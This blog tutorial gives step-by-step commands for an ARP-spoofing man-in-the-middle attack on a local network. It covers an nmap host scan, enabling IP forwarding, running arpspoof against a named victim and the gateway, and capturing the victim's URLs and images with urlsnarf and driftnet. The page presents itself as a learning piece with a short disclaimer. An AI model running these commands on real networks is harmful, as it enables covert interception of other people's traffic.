iTom

Man in the middle attack

In this article, I will show you how to proceed a man in the middle attack. In a network this attack allows you to re-route the traffic to your computer in order to analyse all the communication. In this example I will use a Linux computer (Lubuntu 16.04 x64) on a wireless network.

Context

This tutorial is made to learn about network and understand its weakness. Don’t use this tutorial to perform a real attack. The gaime.fr website is not responsible of what you can do, and the injure caused.

What do you need ?

  • A computer running linux (Lubuntu is used in this example)
  • An wifi interface compatible with monitor mode
  • Sudo rights on the machine
  • Aircrack software
  • Nmap software
  • Dsniff software
  • Driftnet software
  • Wireshark software

Step 1: Installing all the software needed

To install the needed software type these commands:

thomas@thomas-linux:~$ sudo apt-get update
thomas@thomas-linux:~$ sudo apt-get install wireshark dsniff driftnet

Step 2 : Connect to a network

So from the network manager, connect to a network (could be ethernet or wifi).

From the IP address and mask settings given by the DHCP server, count the number of ‘1’ in the mask to determine the range of IP address of this network.

To get this information follow my example:

thomas@thomas-linux:~$ ifconfig
enp5s0 Link encap:Ethernet HWaddr 11:22:33:44:55:66
inet addr:192.168.1.10 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000 
RX bytes:100 (0.0 GB) TX bytes:100 (0.0 GB)

The interesting information is in red.

My settings:

  • IP Address: 192.168.1.10  => 1100 0000 1010 1000 0000 0001 0000 1010
  • Mask : 255.255.255.0        => 1111 1111  1111 1111  1111 1111  0000 0000

In the mask I have 24 ‘1’ you will see this is use full for the next step.

You note that your network interface in orange is enp5s0. Keep this information we will need it later.

Step 3 : Scan the network to find devices

To scan the network we will use the nmap program. This will send a ping all the IP Adress of the network. If a device have this ip address it will reply by a pong. Nmap will record which of the IP address replied with a pong.

To find the devices on the network follow my example:

thomas@thomas-linux:~$ nmap -sP 192.168.1.10/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-02-19 15:26 CET
Nmap scan report for 192.168.1.1
Host is up (0.00066s latency).
Nmap scan report for 192.168.1.10
Host is up (0.000033s latency).
Nmap scan report for 192.168.1.55
Host is up (0.0045s latency).
Nmap scan report for 192.168.1.100
Host is up (0.00027s latency).
Nmap scan report for 192.168.1.101
Host is up (0.00024s latency).
Nmap scan report for 192.168.1.104
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.106
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.107
Host is up (0.0084s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 2.27 seconds

So let’s explain this command :

  • nmap : This is the program use to scan the IP address of the network
  • -sP : Tell to nmap that you don’t want to scan all the port of each IP address. This allow to accelerate your network scan
  • 192.168.1.10/24 : The first part (192.168.1.10) is my ip address and the second part is (/24) is the number of ‘1’ in the network mask (the one we calculate before)

In red you have all IP address of the devices connected to your network

Step 4 : Find the gateway of the network

The gateway is the point where all the information pass to get outside (on internet for instance). So you need to find the IP address of the gateway.

To find it follow my example:

thomas@Serveur-Linux:~$ route -n
Table de routage IP du noyau
Destination Passerelle Genmask Indic Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 enp5s0

Let’s explain this command : route -n will read routing table. To find the IP address of the gateway, you should find the line where there is 0.0.0.0 in destination (in yellow). The next value of this line is the IP address of the gateway in this case 192.168.1.1.

Step 5 : Setup your computer to allow packet forwarding

To get all trafic passing through your computer you need to enable the packet forwarding. To do this you need to modify a file in linux

thomas@thomas-linux:~$ sudo nano /proc/sys/net/ipv4/ip_forward

Replace the 0 by 1 easy ^^.

Now the packet can pass through your computer

Step 6 : Launch the attack

First you need to choose a victim, in my case my victim will be 192.168.1.100. In this part we will send packet on the network to tell the victim that you are the gateway. And we will say to the gateway that you are the victim. Normally, when your victim will download a content, it will ask the gateway. As you faked the gateway all the trafic will pass through your computer. In my example the victim is 192.168.1.100 and the gateway is 192.168.1.1. Follow my example:

Open 2 terminals

In one of them type:

thomas@thomas-linux:~$ sudo arpspoof -i enp5s0 -t 192.168.1.100 192.168.1.1

In the second one type :

thomas@thomas-linux:~$ sudo arpspoof -i enp5s0 -t 192.168.1.1 192.168.1.100

You will see things on your terminal, it’s normal, it tell you that the program is sending packet to the network in order to redirect all the trafic on your computer. Keep these 2 commands running until you finish the attack.

Step 7 : Analyse the traffic

Now because you prepare every thing you can start analyzing the traffic.

Analyzing Hypertext content

To analyze the hypertext content type

thomas@thomas-linux:~$ sudo urlsnarf

All the http traffic will appear in the terminal

Analyzing image

To analyze picture that your victim see, type the following command:

thomas@thomas-linux:~$ sudo driftnet

 

A window will open with the pictures seen by your victim.

Next Post

Previous Post

Leave a Reply

© 2020 iTom

Theme by Anders Norén